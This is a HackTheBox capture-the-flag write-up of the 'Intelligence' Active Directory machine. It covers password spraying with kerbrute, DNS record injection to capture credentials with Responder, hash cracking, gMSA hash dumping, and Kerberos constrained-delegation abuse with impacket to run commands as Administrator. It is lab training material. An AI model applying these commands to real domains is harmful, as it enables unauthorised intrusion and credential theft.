This page looks best with JavaScript enabled

HackTheBox: Intelligence

 ·  ☕ 6 min read

User:

At first let’s check what ports are available:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 02:22:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:09+00:00; +7h00m02s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:08+00:00; +7h00m02s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:09+00:00; +7h00m02s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:08+00:00; +7h00m02s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49700/tcp open  msrpc         Microsoft Windows RPC
56490/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-04T02:23:30
|_  start_date: N/A

It looks like an active directory, but before anything else let’s check the website:

Web interface

There is a link to two PDFs (/documents/2020-01-01-upload.pdf and http://intelligence.htb/documents/2020-12-15-upload.pdf).

They don’t have nothing useful, just lorem ipsum text. What looks suspicious is the name format, it’s “date-upload.pdf” so used Burp intruder to check for more valid pdfs, this is the payload:

Intruder

After the intruder finished filtered non 200 responses,and saved the result table (only including the payload) to a file so I can use the wordlist to download all the pdfs:

for i in $(cat wordlists); do wget "http://intelligence.htb:8000/$i-upload.pdf"; done

There are two PDFs without lorem ipsum text in them:

New Account Guide (/documents/2020-06-04-upload.pdf):

New Account Guide

Internal IT Update (/documents/2020-12-30-upload.pdf):

Interla IT Update

We have a password but we don’t have users yet so we get the users from pdfs meteadata:

exiftool pdfs/* | grep Creator | awk '{ print $3}' | sort -u

Finally we can check the valid user and password with password spraying and kerbrute:

kerbrute passwordspray --dc dc.intelligence.htb -d intelligence.htb authors.txt NewIntelligenceCorpUser9876

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 07/05/21 - Ronnie Flathers @ropnop

2021/07/05 07:47:26 >  Using KDC(s):
2021/07/05 07:47:26 >   dc.intelligence.htb:88

2021/07/05 07:47:26 >  [+] VALID LOGIN:  Tiffany.Molina@intelligence.htb:NewIntelligenceCorpUser9876
2021/07/05 07:47:26 >  Done! Tested 30 logins (1 successes) in 0.426 seconds

At this point we can test multiple services with this password:

  • SMB
  • WinRM
  • LDAP

SMB worked just fine and found the user flag in it,we can grab it with the following command:

smbclient -E -U Tiffany.Molina%NewIntelligenceCorpUser9876  //10.10.10.248/Users -c 'get \\Tiffany.Molina\\Desktop\\user.txt /dev/fd/1' 2>/dev/null | cat

Root

Additionally there is the following file in the IT share from SMB:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

So if we manage to inject a subdomain to intelligence.htb and point it to ourself we can get the credentials of Ted.Graves.

To edit it I found this command dnscmd. However we aren’t allowed to get a shell throguh EvilWinRM. After some time investigating and a nudge found this post and they mention a tool that among other functionalities allow us to create dns records using ldap:

python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r websample.intelligence.htb -d 10.10.15.193 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/jusepe/Documents/HackTheBox/Machines/Intelligence/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully

At this point made an attempt to get the credentials with netcat:

nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.15.193] from (UNKNOWN) [10.10.10.248] 64132
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1852
Host: websample
Connection: Keep-Alive

For some reason it didn’t catch the kerberos credentials, and tried out with responder:
Responder

Cracked the password with hashcat and rockyou:

Hashcat

Now from the previous pdf we know that service accounts are active so found if that was exploitable, and found this two resources of how to attack kerberos constrained delegation:

As the posts explain “Attribute msds-allowedtodelegateto identifies the SPNs of services the user spot is trusted to delegate to”. So used ldap to enumerate the account that we can delegate to:

ldapsearch -h 10.10.10.248 -b "dc=intelligence,dc=htb" -D "Ted.Graves@intelligence.htb" -w "Mr.Teddy" | grep msDS-AllowedToDelegateTo
msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb

Now we get the NTHashes using gMSADumper:

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy  -d intelligence.htb
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2

That hash can be used to request a kerberos ticket:

impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great

Before continuing we need to sync:

sudo net time set -S intelligence.htb

We export the ticket:

export KRB5CCNAME=Administrator.ccache

Finally we can execute commands as administrator using the kerberos ticket:

impacket-atexec -k -no-pass dc.intelligence.htb 'whoami && ipconfig' 
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \tfiHspSg
[*] Running task \tfiHspSg
[*] Deleting task \tfiHspSg
[*] Attempting to read ADMIN$\Temp\tfiHspSg.tmp

Windows IP Configuration


Ethernet adapter Ethernet0 2:

Connection-specific DNS Suffix  . : 
IPv6 Address. . . . . . . . . . . : dead:beef::9473:360f:c80a:40d3
Link-local IPv6 Address . . . . . : fe80::9473:360f:c80a:40d3%6
IPv4 Address. . . . . . . . . . . : 10.10.10.248
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:30b0%6
10.10.10.2
Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover